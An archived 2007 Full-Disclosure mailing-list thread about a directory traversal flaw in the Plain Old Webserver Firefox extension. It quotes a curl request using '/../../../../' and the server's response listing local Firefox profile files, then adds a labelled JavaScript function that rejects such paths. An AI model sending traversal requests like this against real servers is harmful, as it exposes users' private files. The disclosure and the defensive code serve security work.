Message-ID: <6905b1570702091047p66b3035t9246d061cd4c242b@mail.gmail.com>
Date: Fri, 9 Feb 2007 18:47:57 +0000
From: "pdp (architect)" <pdp.gnucitizen@...glemail.com>
To: "Stefano Di Paola" <stefano.dipaola@...ec.it>
Cc: full-disclosure@...ts.grok.org.uk, WASC Forum <websecurity@...appsec.org>
Subject: Re: [WEB SECURITY] Plain Old Webserver - The coolest firefox extension

hey man, this is not news :)

On 2/9/07, Stefano Di Paola <stefano.dipaola@...ec.it> wrote:
> Plain Old Web Server
> Good Old Dir Traversal
>
> curl "127.0.0.1:6670/../../../../" -kivvv
> * About to connect() to 127.0.0.1 port 6670
> * Trying 127.0.0.1... connected
> * Connected to 127.0.0.1 (127.0.0.1) port 6670
> > GET /../../../../ HTTP/1.1
> > User-Agent: HackTheHacker(tm)
> > Host: 127.0.0.1:6670
> > Accept: */*
> >
> < HTTP/1.1 200 OK
> HTTP/1.1 200 OK
> < Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT;
> path=/;
> Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/;
> < Content-Type: text/html
> Content-Type: text/html
> < pow_server: POW/0.0.7
> pow_server: POW/0.0.7
> < Content-Location: /../../../../
> Content-Location: /../../../../
> < Content-Length: 280
> Content-Length: 280
>
> <br><br><br><br>
> <a href='/../../../../firefox/'>firefox/</a><br>
> <a href='/../../../../bookmarks.html'>bookmarks.html</a><br>
> <a href='/../../../../appreg'>appreg</a><br>
> <a href='/../../../../default/'>default/</a><br>
> <a href='/../../../../pluginreg.dat'>pluginreg.dat</a><br>
> * Connection #0 to host 127.0.0.1 left intact
> * Closing connection #0
>
>
> A new motto is on the way:
> HackTheHacker (ascii (tm))
>
> :)
>
> Cheers,
> Stefano
>
> On Fri, 09/02/2007 at 16.23 +0000, pdp (architect) wrote:
> > http://www.gnucitizen.org/blog/plain-old-webserver
> >
> > Must have Firefox Extension that allows you to do all sorts of crazy stuff.
> >
> > https://addons.mozilla.org/firefox/3002/
> >
> --
> ...oOOo...oOOo....
> Stefano Di Paola
> Software & Security Engineer
>
> Web: www.wisec.it
> ..................
>
>
--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
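
A server-side check that would refuse the `GET /../../../../` request shown in the quoted curl session, as an added example that is not part of the original thread and is not POW's own code. The function names and the document root `/srv/pow/htdocs` are hypothetical.

```javascript
// Added example (not POW's code): confine a request path to a document root.
// Function names and the sample document root are hypothetical.

// Returns the path segments below the root, or null if the request must be
// refused because it is malformed or would climb above the root.
function resolveRequestPath(requestTarget) {
  // Only the path part selects a file; drop any query string or fragment.
  const rawPath = requestTarget.split(/[?#]/, 1)[0];
  let decoded;
  try {
    // Decode exactly once, BEFORE checking, so %2e%2e%2f is seen as ../
    decoded = decodeURIComponent(rawPath);
  } catch (e) {
    return null; // malformed percent-encoding
  }
  if (decoded.includes("\0")) return null; // NUL can truncate paths in native APIs
  // Treat backslash as a separator too, so ..\ cannot slip past on Windows.
  const segments = decoded.replace(/\\/g, "/").split("/");
  const resolved = [];
  for (const seg of segments) {
    if (seg === "" || seg === ".") continue; // empty and current-dir segments
    if (seg === "..") {
      if (resolved.length === 0) return null; // would leave the document root
      resolved.pop();
      continue;
    }
    resolved.push(seg);
  }
  return resolved;
}

// Maps a request target to a filesystem path under docRoot, or null to refuse.
function toFilesystemPath(docRoot, requestTarget) {
  const segs = resolveRequestPath(requestTarget);
  if (segs === null) return null;
  return [docRoot.replace(/\/+$/, ""), ...segs].join("/");
}

// Constructed sample requests; the first is the path from the curl session.
const samples = ["/../../../../", "/%2e%2e/%2e%2e/bookmarks.html",
                 "/docs/../index.html", "/index.html?x=1"];
for (const s of samples) {
  const p = toFilesystemPath("/srv/pow/htdocs", s);
  console.log(s, "->", p === null ? "400 refused" : p);
}
```

A server that follows symbolic links should additionally compare the canonical on-disk path against the canonical root before opening the file, since this check only covers the request string.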